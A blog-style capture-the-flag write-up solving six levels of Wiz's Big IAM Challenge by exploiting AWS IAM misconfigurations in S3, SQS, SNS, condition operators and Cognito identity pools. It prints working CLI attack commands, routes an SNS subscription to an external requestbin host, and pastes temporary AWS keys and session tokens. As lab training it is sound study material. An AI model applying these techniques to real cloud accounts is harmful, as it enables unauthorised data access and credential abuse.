Big IAM Challenge

The The Big IAM Challenge is a cloud security Capture The Flag (CTF) event organize by Wiz with the goal of identifying and and exploiting AWS IAM misconfigurations, and learn from real-world scenarios.

Start Challenge

Level 1: Buckets of Fun

IAM Policy

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": "*",
            "Action": "s3:GetObject",
            "Resource": "arn:aws:s3:::thebigiamchallenge-storage-9979f4b/*"
        },
        {
            "Effect": "Allow",
            "Principal": "*",
            "Action": "s3:ListBucket",
            "Resource": "arn:aws:s3:::thebigiamchallenge-storage-9979f4b",
            "Condition": {
                "StringLike": {
                    "s3:prefix": "files/*"
                }
            }
        }
    ]
}

Solve

We can see that ased on the IAM Policy, the principal "*" is given the Allow effect on theActions3:ListBucket and s3:GetObject with the scope of thebigiamchallenge-storage-9979f4b

This means that any public user is able to access the bucket and download file from it

aws s3 ls s3://thebigiamchallenge-storage-9979f4b/files/
2023-06-05 19:13:53         37 flag1.txt
2023-06-08 19:18:24      81889 logo.pngaws s3 ls s3://thebigiamchallenge-storage-9979f4b/files/

aws s3 cp s3://thebigiamchallenge-storage-9979f4b/files/flag1.txt -
{wiz:exposed-storage-risky-as-usual}aws s3 cp s3://thebigiamchallenge-storage-9979f4b/files/flag1.txt -

In fact, we are able to annoymously access it, even without the preconfigured aws account on the iam challenge website.

aws s3 cp s3://thebigiamchallenge-storage-9979f4b/files/flag1.txt - --no-sign-request
{wiz:exposed-storage-risky-as-usual}

Reference:

https://docs.aws.amazon.com/cli/latest/reference/s3/cp.html

Level 2: Google Analytics

IAM Policy

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": "*",
            "Action": [
                "sqs:SendMessage",
                "sqs:ReceiveMessage"
            ],
            "Resource": "arn:aws:sqs:us-east-1:092297851374:wiz-tbic-analytics-sqs-queue-ca7a1b2"
        }
    ]
}

Solve

Since the challenge says it uses tthe analytics sysem on this website, I viewed page source, and managed to get the queue URL. However, we are also able to manually recreate the SQS Queue URL as we have enough information within the IAM Policy.

// Initialize the Amazon Cognito credentials provider
  AWS.config.region = 'us-east-1';
AWS.config.credentials = new AWS.CognitoIdentityCredentials({IdentityPoolId: 'us-east-1:c6f3eb2e-3cb5-404e-93bc-f0bdf7ad042e'});
// Set the region
AWS.config.update({region: 'us-east-1'});

// Create an SQS service object for Web Analytics.
// Log trafic from all users into SQS.
var sqs = new AWS.SQS({apiVersion: '2012-11-05'});

var params = {
  DelaySeconds: 0,
  MessageBody: JSON.stringify({"URL": document.location.href, "User-Agent": navigator.userAgent, "IsAdmin": false}),
  QueueUrl: "https://sqs.us-east-1.amazonaws.com/092297851374/wiz-tbic-analytics-sqs-queue-ca7a1b2"
};

sqs.sendMessage(params, function(err, data) {
  if (err) {
    console.log("Error", err);
  } else {
    console.log("Success", data.MessageId);
  }
});

Next, I try and receive-message and was able ot get the flag.

aws sqs receive-message --queue-url https://sqs.us-east-1.amazonaws.com/092297851374/wiz-tbic-analytics-sqs-queue-ca7a1b2

{
    "Messages": [
        {
            "MessageId": "97659e07-7a6f-4feb-a1f6-c82b59c5f98b",
            "ReceiptHandle": "AQEBqt1TrGkiw0s9ks5CLMSvaXhrfInB3poMtpTzdS4CevOTikTEwKpGWf3IMQGlBX7S4qVIHVCX1HJQg8p+mahrsva2UBZhbPPVVCe8wfzhLUuAoo2MAyLuQRbHHlBdZ0gT0l3Zi5bTIpl1qn2/TAP9jYJXfZ
wbDEnqY1EKCjE0nTXOYzeyI3ALdAqq3Kr6L3IvlAsUZtxSExO/TKDUKtlmTi09Pawp9vAxag304lEM30sxdRY0y/rdadgrlEfo1tb218gWaZieBGftY8sYyrk0xN7YHO68C7vxIVtGUEUm8kZNNL4BRBtNvsbeOrG4zaHwuXptW0ZNK89fGchnOMfWad
X8RZ1abLdARxsvXQqH77maGPNSfrT+sH5/4ayFXkaJv8CC6eViIepOkwRq9c+d3iZl2VJev8DpNDcHRcjbUH4=",
            "MD5OfBody": "4cb94e2bb71dbd5de6372f7eaea5c3fd",
            "Body": "{\"URL\": \"https://tbic-wiz-analytics-bucket-b44867f.s3.amazonaws.com/pAXCWLa6ql.html\", \"User-Agent\": \"Lynx/2.5329.3258dev.35046 libwww-FM/2.14 SSL-MM/1.4.3714\",
 \"IsAdmin\": true}"
        }
    ]
}

Based on the meswsage body, theres a URL, and going to the URL gives us the flag.

curl https://tbic-wiz-analytics-bucket-b44867f.s3.amazonaws.com/pAXCWLa6ql.html
{wiz:you-are-at-the-front-of-the-queue}

Flag: {wiz:you-are-at-the-front-of-the-queue}

Reference:

https://docs.aws.amazon.com/cli/latest/reference/sqs/receive-message.html

Level 3: Enable Push Notifications

IAM Policy

{
    "Version": "2008-10-17",
    "Id": "Statement1",
    "Statement": [
        {
            "Sid": "Statement1",
            "Effect": "Allow",
            "Principal": {
                "AWS": "*"
            },
            "Action": "SNS:Subscribe",
            "Resource": "arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications",
            "Condition": {
                "StringLike": {
                    "sns:Endpoint": "*@tbic.wiz.io"
                }
            }
        }
    ]
}

Based on the aws cli reference page for sns subscribe. Note that theres a wild card reference for the sns:Endpoint allowing us to point it to any site we control as long as it ends with "@tbic.wiz.io"

aws sns subscribe --topic-arn arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications --protocol https --notification-endpoint https://enkcp8aoixerj.x.pipedream.net/[email protected]

In the requestbin output, theres a subscribe url.

Visiting the URL gives us a confirmation response that we have subscribed to the topic.

<ConfirmSubscriptionResponse xmlns="http://sns.amazonaws.com/doc/2010-03-31/">
<ConfirmSubscriptionResult>
<SubscriptionArn>arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications:80e4c88f-2a79-4a0a-8051-bd883b77056a</SubscriptionArn>
</ConfirmSubscriptionResult>
<ResponseMetadata>
<RequestId>0c20196b-7331-5957-9e2c-476809be1a7a</RequestId>
</ResponseMetadata>
</ConfirmSubscriptionResponse>

And we succesfully gotten the flag from our request bin.

Flag: {wiz:always-suspect-asterisks}

Reference:

https://docs.aws.amazon.com/cli/latest/reference/sns/subscribe.html

Level 4: Admin Only

IAM Policy

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": "*",
            "Action": "s3:GetObject",
            "Resource": "arn:aws:s3:::thebigiamchallenge-admin-storage-abf1321/*"
        },
        {
            "Effect": "Allow",
            "Principal": "*",
            "Action": "s3:ListBucket",
            "Resource": "arn:aws:s3:::thebigiamchallenge-admin-storage-abf1321",
            "Condition": {
                "StringLike": {
                    "s3:prefix": "files/*"
                },
                "ForAllValues:StringLike": {
                    "aws:PrincipalArn": "arn:aws:iam::133713371337:user/admin"
                }
            }
        }
    ]
}

At a glance, the IAM Policy seems secure, that it scoped to only allow if the aws:PrincipalArn is the arn of the admin account. However, the vulnerabiliy comes in the ForAllValues which will return true if there are no context key in the requests.

We can simply run the s3 command with no-sign-requests to ensure that the PrincipalArn is not being sent in the request and able to retrieve the flag.

> aws s3 ls s3://thebigiamchallenge-admin-storage-abf1321/files/ --no-sign-request
2023-06-07 19:15:43         42 flag-as-admin.txt
2023-06-08 19:20:01      81889 logo-admin.png

> aws s3 cp s3://thebigiamchallenge-admin-storage-abf1321/files/flag-as-admin.txt - --no-sign-request
{wiz:principal-arn-is-not-what-you-think}

Flag: {wiz:principal-arn-is-not-what-you-think}

Reference: https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_elements_condition_operators.html

https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_condition-single-vs-multi-valued-context-keys.html#reference_policies_condition-multi-valued-context-keys

Level 5: Do I know you?

IAM Policy

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": [
                "mobileanalytics:PutEvents",
                "cognito-sync:*"
            ],
            "Resource": "*"
        },
        {
            "Sid": "VisualEditor1",
            "Effect": "Allow",
            "Action": [
                "s3:GetObject",
                "s3:ListBucket"
            ],
            "Resource": [
                "arn:aws:s3:::wiz-privatefiles",
                "arn:aws:s3:::wiz-privatefiles/*"
            ]
        }
    ]
}

Recalling from previous level, there were some cognito credentials in the browser javascript. I viewed the page source and we can see something similar.

  AWS.config.region = 'us-east-1';
  AWS.config.credentials = new AWS.CognitoIdentityCredentials({IdentityPoolId: "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"});
  // Set the region
  AWS.config.update({region: 'us-east-1'});

  $(document).ready(function() {
    var s3 = new AWS.S3();
    params = {
      Bucket: 'wiz-privatefiles',
      Key: 'cognito1.png',
      Expires: 60 * 60
    }

    signedUrl = s3.getSignedUrl('getObject', params, function (err, url) {
      $('#signedImg').attr('src', url);
    });
});

The browser gets a cognito identity credentials from the id pool, and use it to retrieve the file cognito1.png using s3 presigned url, which we can see in the browser source. when inspecting element.

Since the AWS.config.credentials is being created by javascript, we can just run the browser console to retrieve the credentials.

With the credentials we are able to then access the AWS S3 bucket normally using AWS CLI.

{
    "AccessKeyId": "ASIARK7LBOHXOZC6UC63",
    "SecretKey": "XnKcOsg32TtUbawDXNx24UDA91NnUcm8SbdtBik4",
    "SessionToken": "IQoJb3JpZ2luX2VjEO7//////////wEaCXVzLWVhc3QtMSJIMEYCIQCyIRjUgrnBcZgXvvb3Pd36y5K79sRmxYXk9uOytJ2ZNgIhAPbBI8HURFpwF+9OIkjldiQ6B27KtRT5k9yzT4m3CM6XKskFCHYQABoMMDkyMjk3ODUxMzc0IgygwcuHwXUiG/4Az3UqpgVJrklNqZm09uSXrroAQ4ZS0+Cn4wH1pQYDdQ1AMtDExbROvVnnWJyFvdgZceUa6dP8QiL6m128BzqxXUNUjOM2CFO9N3R9KO8FLMxm0flqYbgZhrVlnuqTHztLmvowzagk2dKTE03vAtFL+1FWhETuM5TgoKtQeY8OUBQrEDDTlhvz03hFRF6muF2Mx1e1e1NJtK1VuQYEs/7OOCUMiEgXnAGENZKJgbaW+g168wXudYOH1L7Qt1bQePmqsu1Fx8AMDklLfMwcPqPWQPBAMTodEUIWA77pKHB8pqjNQEW0HDRJp2KzfvbkdpRWvU6ALIhu1pcNLM1O4TisdoCNdcppbolo+Iv4QgspButBpWfjAc1FzHI6WMDIIy3xoaWuc21k+CaVpBNpYnIGzZny6amI2cE7GddR6LSL9dhCXSE6DukvYVGr9YmXYnFqJFH3nsCRU+sG14URYoHsWPKfS9/gxHjT1G0IdQ6ehdUrE4XMSwHL92p0nIdrBhJz3ZwnHKiYePT92KEP9nKGQj8X2EW2YteWpzmPh+roVsqqxrJFFsucCQ19oPZx0iI3NKmgjweSvK94Hh6WKjPYzsKZwguhRo3WKRH7RfEliRat+KYN4jtlHeBMY/PYWtO+XohvBMPyjihAOan38d+D/NWiSfRzGtxHhaVwcB3Ls6YPd6fk1nOdTlAH8NcgOJ+cJM4oQGVRrgjtMdftrFNrLZhIIL666WyWXDt1yPb9sUj8v8dA8VRHq10+6aC4s2+3vTRYQYGnmrU7+DRZQURM1ZdEd6DoACrOsdX7kT6qXtnvBNl9apoFdXEgp5Qkqfxy9/Km+mvYZbowJAtqEv2LYrO+PE1wx+VE58Nmm/OQhHHsprb37mDNSlqBaLrg4wmyisW4REqV/pIBjxYw9YGmrAY63AJt9jE+06aJVTloN+lhDGH2nG5HJmPeDt2zebkK4DKNK8NKugfapAmYXYghTvbDffbC/4Zo3OQ8y0zNanbay/OfgQFvOFhhNku/R6/iE2s4gpoGLBfHVkGdSFbAdfZiWqbVWfqUWOxgZMRyGlwFZhLvrD03sSH7m1+GVlHoioC8i1Cm9GO8sp0kVN+8Dqzu4qOQ6QLvHWH7tax872RWaWI2lX56OY9cvHXCqe2NveVaOF8vNdDWGb/iNsJWGnJ8j8rrqkT3n/ZjwHUknBefr6xpuhaMh4QQCvn8VofSTcJUCNZQSpZEtkBqfiKAza5XDo3UC940/8BiX0XoDTjse7lXyMhqG0I+v+pLjv4Ue5IsbLV20P+3dQZKSPF4b+EuGKkuyF5C1PfpsqMy8wYEVVPLtGW0Zugc0TXeCZ8Jr1vd9hzzwbqV7AKGJ2SApD2aYQO1NQrBbgTV3Gx0N8U=",
    "Expiration": "2023-12-25T14:17:41.000Z"
}

I tried to run aws configure to configure the account, but as we are in a read only file system, I was not able to create the .aws/credentials file. So I just exported them to environment variable, and tried to retrieve the flag

> export aws_access_key_id="ASIARK7LBOHXOZC6UC63"
> export aws_secret_access_key=XnKcOsg32TtUbawDXNx24UDA91NnUcm8SbdtBik4
> export aws_session_token="IQoJb3JpZ2luX2VjEO7//////////wEaCXVzLWVhc3QtMSJIMEYCIQCyIRjUgrnBcZgXvvb3Pd36y5K79sRmxYXk9uOytJ2ZNgIhAPbBI8HURFpwF+9OIkjldiQ6B27KtRT5k9yzT4m3CM6XKskFCHYQABoMMDkyMjk3ODUxMzc0IgygwcuHwXUiG/4Az3UqpgVJrklNqZm09uSXrroAQ4ZS0+Cn4wH1pQYDdQ1AMtDExbROvVnnWJyFvdgZceUa6dP8QiL6m128BzqxXUNUjOM2CFO9N3R9KO8FLMxm0flqYbgZhrVlnuqTHztLmvowzagk2dKTE03vAtFL+1FWhETuM5TgoKtQeY8OUBQrEDDTlhvz03hFRF6muF2Mx1e1e1NJtK1VuQYEs/7OOCUMiEgXnAGENZKJgbaW+g168wXudYOH1L7Qt1bQePmqsu1Fx8AMDklLfMwcPqPWQPBAMTodEUIWA77pKHB8pqjNQEW0HDRJp2KzfvbkdpRWvU6ALIhu1pcNLM1O4TisdoCNdcppbolo+Iv4QgspButBpWfjAc1FzHI6WMDIIy3xoaWuc21k+CaVpBNpYnIGzZny6amI2cE7GddR6LSL9dhCXSE6DukvYVGr9YmXYnFqJFH3nsCRU+sG14URYoHsWPKfS9/gxHjT1G0IdQ6ehdUrE4XMSwHL92p0nIdrBhJz3ZwnHKiYePT92KEP9nKGQj8X2EW2YteWpzmPh+roVsqqxrJFFsucCQ19oPZx0iI3NKmgjweSvK94Hh6WKjPYzsKZwguhRo3WKRH7RfEliRat+KYN4jtlHeBMY/PYWtO+XohvBMPyjihAOan38d+D/NWiSfRzGtxHhaVwcB3Ls6YPd6fk1nOdTlAH8NcgOJ+cJM4oQGVRrgjtMdftrFNrLZhIIL666WyWXDt1yPb9sUj8v8dA8VRHq10+6aC4s2+3vTRYQYGnmrU7+DRZQURM1ZdEd6DoACrOsdX7kT6qXtnvBNl9apoFdXEgp5Qkqfxy9/Km+mvYZbowJAtqEv2LYrO+PE1wx+VE58Nmm/OQhHHsprb37mDNSlqBaLrg4wmyisW4REqV/pIBjxYw9YGmrAY63AJt9jE+06aJVTloN+lhDGH2nG5HJmPeDt2zebkK4DKNK8NKugfapAmYXYghTvbDffbC/4Zo3OQ8y0zNanbay/OfgQFvOFhhNku/R6/iE2s4gpoGLBfHVkGdSFbAdfZiWqbVWfqUWOxgZMRyGlwFZhLvrD03sSH7m1+GVlHoioC8i1Cm9GO8sp0kVN+8Dqzu4qOQ6QLvHWH7tax872RWaWI2lX56OY9cvHXCqe2NveVaOF8vNdDWGb/iNsJWGnJ8j8rrqkT3n/ZjwHUknBefr6xpuhaMh4QQCvn8VofSTcJUCNZQSpZEtkBqfiKAza5XDo3UC940/8BiX0XoDTjse7lXyMhqG0I+v+pLjv4Ue5IsbLV20P+3dQZKSPF4b+EuGKkuyF5C1PfpsqMy8wYEVVPLtGW0Zugc0TXeCZ8Jr1vd9hzzwbqV7AKGJ2SApD2aYQO1NQrBbgTV3Gx0N8U="

However, when runnning env we can clearly see that the session token wasnt being modified.

So lets spin up a virtual machine and use it to get the flag.

aws configure --profile level5
AWS Access Key ID [None]: ASIARK7LBOHXOZC6UC63
AWS Secret Access Key [None]: XnKcOsg32TtUbawDXNx24UDA91NnUcm8SbdtBik4
Default region name [None]: 
Default output format [None]: us-west-1

aws s3 ls s3://wiz-privatefiles --profile level5
2023-06-06 03:42:27       4220 cognito1.png
2023-06-05 21:28:35         37 flag1.txt

aws s3 cp s3://wiz-privatefiles/flag1.txt - --profile level5
{wiz:incognito-is-always-suspicious}

Flag: {wiz:incognito-is-always-suspicious}

Level 6: One final push

IAM Policy

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {
                "Federated": "cognito-identity.amazonaws.com"
            },
            "Action": "sts:AssumeRoleWithWebIdentity",
            "Condition": {
                "StringEquals": {
                    "cognito-identity.amazonaws.com:aud": "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"
                }
            }
        }
    ]
}

First, lets figure out what Cognito Identitty really does, as I cheesed level 5 with the credentials from the browser javascript console.

Cognito Federated Identities allow scoped temporary credentials to untrusted environment. Doing further research

First, we will need to get the cognito id, based on the identity-pool-id which is given in the IAM Policy with the aws get-id commands.

aws cognito-identity get-id  --identity-pool-id us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b
{
    "IdentityId": "us-east-1:444cf3c5-b7c1-4f05-9fe0-9c4450ccd958"
}

With the IdentityId we are then able to get a set of credentials to use. What we doing here is what the JavaScript code at Level5 does.

aws cognito-identity get-credentials-for-identity --identity-id us-east-1:444cf3c5-b7c1-4f05-9fe0-9c4450ccd958 --region us-east-1
{
    "IdentityId": "us-east-1:444cf3c5-b7c1-4f05-9fe0-9c4450ccd958",
    "Credentials": {
        "AccessKeyId": "ASIARK7LBOHXMQM5YB74",
        "SecretKey": "r2RYZLdvtX3x88t/OJLScFeyKtJtqMECwTzrhlIT",
        "SessionToken": "IQoJb3JpZ2luX2VjEO7//////////wEaCXVzLWVhc3QtMSJHMEUCIA5nWZcHrI9vtOsT+Hmuk5LwKbSRsbfUsYegGkqD5dGgAiEA8Zh3CHqRHTmLqZbB7rkrAWUvNoZ9imytigShi/h4V0sqyQUIdxAAGgwwOTIyOTc4NTEzNzQiDLgKYDNiCTAAA6B6sSqmBZLtfuLVSd5jAzr9qxANPiYziD3rdq6Gp4P0a/o6hrFvrjNgiDEUxsiml5t+f5/NYAJ29ML5L/EPSgb6sONJEFlio5+FSvIK7/Er2NDMsJfM0cmRLh3nF5Qh/xwAZYHiarIh5FVYHp5cPcx49A5ZVPv++eCP5tjQcfYh+KBf5FuphRp5Qtk7eOxkfApg4PIpu8VYBDffBaR81hQbhr7SQzigWCFwLokPNALJeV2rY5njQSP54nQcQbv/fEBPYb4dZR0Qu1uEOZAkfuRTLetBObnQ1hiSPJFI9om7VFe9Px5UfY5m6VaydJGYvDphe8mmcIzkABlprq4IKlj9mWf09oB8HCbO50vvI+y1kR0IklcXIt96iGqNy3lanxKrbLisDfPhDX2NFjUB0JaUext+HsyEcegHecrDlNYgxSVxsRwl7/4o/2lV6iUT237N4JHS8tUrftD8Gxt7jDYa8OmeKyIeViPGAUldTMXAc7mUgptxpLA3KC7kGtVbOtWF4lWzZq0lS36sOC48erfNzFmpynaYLJs8+El+hHCoWDnp1pDvJ4JA8RMOEVtTYc1v63ruXnP4XXu/kRme2ordTFxS7NrOr663lJN9rXpI2ZWz4KXl5iXfcOTGuyK5sXNEzQCvgz39JCMfVsVfnUOsNPf6Z/VfNbIzoo7aJ54nobduO0gohzZ+ERtuVj05FFbJZrTVu8l0peTmHe5QCfL/30D8zCZ7cFjRYPrugl2MmzND2tYQYNfOt4Jw88rESn07waB9irryKq5oKKyIp2yNii3kTwODldWm+KYVVx7pDjrpBj7a5u4By0EujiITJJSMie2dwoV/FjzdaIXOthT6tVF48BAODSR+2TCxPnGt6qqKwopWRUeqqwkBMiX7tNYoO6KL5ymdEqJ+eTC3jKasBjrdAs6AFV1JepywRjAWyHFgD43kIy/G/3PuvCmim63frO73SfmhJbke7/CyzrM0bKFIILPgHoeGAtealkI7NrHm8FT2onqMQB7hZGtday97r1Qb9mJlzgfv7HMJtnZRvBb0QvAh61uXHwf1181CJpuPojTLEs+HwHzvQaiU2dIh+ZwcKolx/5tAb+ayc3yUrDL5Smb3sU54FaFaDEvlZMZtNb870AVpG1PWwvEY6cpfc+FusjQT992Xh8gxX1oESATikYrkfTa+WID6ogPeUJdY/exTb1V3dEUa1/FqxDTe82/qWKnU5pKZXbDLujsdWBvmFqopTR7Tg1Rd3/+noVs+x5MPeAqvrAsaZ6vdpKdX3wKZlwfjpymMWqiZhh+JUVW8+qzC13i6u16zs3Xyhz2K2r8SXqMd/YdMLTGHjRfTC+e/H7FTTAzUEFQsae3V+bVSTMjEpcOKyISjyq50C58=",
        "Expiration": "2023-12-25T22:40:07+08:00"
    }
}

Now, we just need to asssume the role and get the flag. However, we need an OAuth 2.0 or OCID token to run the assume-role-with-web-identity command. Doing further enumeration shows the aws cognito-identity get-open-id-token commands which returns a OpenID Token.

aws cognito-identity get-open-id-token --identity-id us-east-1:444cf3c5-b7c1-4f05-9fe0-9c4450ccd958 --region us-east-1
{
    "IdentityId": "us-east-1:444cf3c5-b7c1-4f05-9fe0-9c4450ccd958",
    "Token": "eyJraWQiOiJ1cy1lYXN0LTE0IiwidHlwIjoiSldTIiwiYWxnIjoiUlM1MTIifQ.eyJzdWIiOiJ1cy1lYXN0LTE6NDQ0Y2YzYzUtYjdjMS00ZjA1LTlmZTAtOWM0NDUwY2NkOTU4IiwiYXVkIjoidXMtZWFzdC0xOmI3M2NiMmQyLTBkMDAtNGU3Ny04ZTgwLWY5OWQ5YzEzZGEzYiIsImFtciI6WyJ1bmF1dGhlbnRpY2F0ZWQiXSwiaXNzIjoiaHR0cHM6Ly9jb2duaXRvLWlkZW50aXR5LmFtYXpvbmF3cy5jb20iLCJleHAiOjE3MDM1MTMxNTMsImlhdCI6MTcwMzUxMjU1M30.H_F1noIBphPlyJzTEDrlrNu0DBQuZ1LppAwHis-Wglpc8essRw3QL-OjTQhdD50u2ziizdK9jvjvsOc5lTIHoih8tooIdGTMZipgUPHLwIEqXyMEdQwkMV4FgPY4igPCoBGTcZykaUoOopCy6sQAf2X0AqCItKrgKZiPPxgeTlpGugLdc6Ygsji3IVi0DIGpJR78aOEnRuY9KpEp6iq-0G0s0Fc6PFw8UxHukS65WUD0-avGoFgAqIUWb_lBo0zT23LmcuAKefykH4B13-EzSzPTjDYcpgHMI8or--6ffRZ4UuQ7czvX_BZ6fR8U0V5XqkaLV7yhoj4Pk8QRtJ-Qrw"
}

Now, we just need to assume the roie with the OpenID Token..

TOKEN=$(aws cognito-identity get-open-id-token --identity-id us-east-1:444cf3c5-b7c1-4f05-9fe0-9c4450ccd958 --region us-east-1 | jq '.Token' | tr -d '"')

aws sts assume-role-with-web-identity --role-arn arn:aws:iam::092297851374:role/Cognito_s3accessAuth_Role --role-session-name something --web-identity-token $TOKEN

{
    "Credentials": {
        "AccessKeyId": "ASIARK7LBOHXFJ65BTNL",
        "SecretAccessKey": "t9uP1qLE5SKGRLCOrr9S45kUWY7+sjfZLpxSbRHE",
        "SessionToken": "FwoGZXIvYXdzEP///////////wEaDF0vM/GAyYNw3JzReyKhAgxxe0izuWhGTIjRgNzJz90wI52Gw+uv9GukhScmTU5Zz8BZCznhAxkRxkMoAL6jgZ8Q7V3NhWYYOyLlrY825Q+eb8PdsEa+6YDdGaf05oSCiVEKh/sOKbpduW/3lAbyEToePau1ovWnh62e9pZiSB0Ifxuwe9XTtfYweUJUGCG6614XVgILpbxrE/6iV9l/73YYodu2b2ElwlCeKyYxoUiB0EK+8K6Wi0hxpmwVclLW0CqzQSCY8GAWfod0dwXDWJi86R779ufmsV6PQYMBq+4ajZotdbt4kh2B9Qo8uKfdJlG+Cwf7ooFEKuizhsOWYfPKnMUUGlg8DggH5uqgpfAs166kY//a7fIAnOOV29/m7ZDZNPkv9Szt4i9zNSRTDPwokpamrAYylgHJ9GZhFKCt+St+TwNla9IiXVJCYlytmio3HNVdwXnVKoRTc6NZg+NC2wz1RicZ1xmQVSuFCq+alAnd7Z3Uej1j02xSDi3uLEmvjxo+3sh7G8r16/Pnsmrs8iIVxUXHbVW1ugMLCvQWCa6yT1+4p4+bNnQ29n+nolBhKW8Po9Nvv/XaqGGVV6By8yxkvAYZu0Mdc536B1g=",
        "Expiration": "2023-12-25T15:00:50+00:00"
    },
    "SubjectFromWebIdentityToken": "us-east-1:444cf3c5-b7c1-4f05-9fe0-9c4450ccd958",
    "AssumedRoleUser": {
        "AssumedRoleId": "AROARK7LBOHXASFTNOIZG:something",
        "Arn": "arn:aws:sts::092297851374:assumed-role/Cognito_s3accessAuth_Role/something"
    },
    "Provider": "cognito-identity.amazonaws.com",
    "Audience": "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"
}

Now with the assumed role credentials, we are able to then authenticate and get the flag.

aws s3 ls --profile level6                                                                                                                                         
2023-06-05 01:07:29 tbic-wiz-analytics-bucket-b44867f
2023-06-05 21:07:44 thebigiamchallenge-admin-storage-abf1321
2023-06-05 00:31:02 thebigiamchallenge-storage-9979f4b
2023-06-05 21:28:31 wiz-privatefiles
2023-06-05 21:28:31 wiz-privatefiles-x1000

aws s3 ls s3://wiz-privatefiles-x1000 --profile level6
2023-06-06 03:42:27       4220 cognito2.png
2023-06-05 21:28:35         40 flag2.txt

aws s3 cp s3://wiz-privatefiles-x1000/flag2.txt - --profile level6
{wiz:open-sesame-or-shell-i-say-openid}

Reference:

https://docs.aws.amazon.com/cli/latest/reference/cognito-identity/

https://docs.aws.amazon.com/cli/latest/reference/cognito-identity/get-id.html

https://docs.aws.amazon.com/cli/latest/reference/cognito-identity/get-credentials-for-identity.html

https://docs.aws.amazon.com/cli/latest/reference/sts/assume-role-with-web-identity.html

PreviousEKS Cluster Games NextStack The Flag

Last updated 2 years ago

Was this helpful?